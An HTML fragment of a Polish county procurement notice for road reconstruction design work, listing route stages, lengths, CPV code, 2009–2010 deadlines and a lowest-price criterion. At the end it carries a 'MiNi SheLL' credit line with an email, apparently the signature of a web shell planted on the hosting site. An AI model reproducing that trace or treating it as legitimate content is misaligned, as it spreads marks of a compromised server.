<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Przebudowa drogi powiatowej nr 1231F Wilkowo - Borów - Ołobok z podziałem na trzy etapy - łączna długość ok. 6.110 km
a)	Wilkowo (od drogi krajowej nr 2) do miejscowości Borów 
b)	miejscowość Borów 
c)	od miejscowości Borów - do skrzyżowania z drogą powiatową nr 1223F w miejscowości Ołobok.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej na przebudowę drogi powiatowej nr 1225F Skape-Rokietnica-węgrzynice-Niedźwiedź-Toporów oraz odcinek od granicy powiatu kierunek Gryżyna do miejscowości Węgrzynice..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> II. Przebudowa drogi powiatowej nr 1225F Skąpe - Rokitnica - Węgrzynice - Niedźwiedź - Toporów oraz odcinek od granicy powiatu kierunek Gryżyna do miejscowości Węgrzynice (skrzyżowanie z drogą powiatową nr 1226F) - łączna długość ok. 23.768 km z podziałem na następujące etapy:
a)	od skrzyżowania z drogą wojewódzką nr 276 do skrzyżowania z droga powiatową 
nr 1227F
b)	od skrzyżowania z drogą powiatową nr 1227F do Rokitnicy (łącznie ze skrzyżowaniem) - do skrzyżowania z drogą powiatową nr 1228F, możliwość podziału na dodatkowe etapy
c)	od skrzyżowania z drogą powiatową nr 1228F do końca Rokitnicy (wyjazd w kierunku Węgrzynic) 
d)	od Rokitnicy do Węgrzynic - do skrzyżowania z drogą powiatową nr 1226F 
e)	od skrzyżowania z drogą powiatową nr 1226F do Niedźwiedzia 
f)	miejscowość Niedźwiedź
g)	od miejscowości Niedźwiedź do Toporowa 
h)	miejscowość Toporów 
i)	miejscowość Węgrzynice - w ciągu dróg 1226F, 1225F oraz 1157F
j)	od granicy powiatu kierunek Gryżyna do miejscowości Węgrzynice (skrzyżowanie 
z drogą powiatową nr 1226F).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com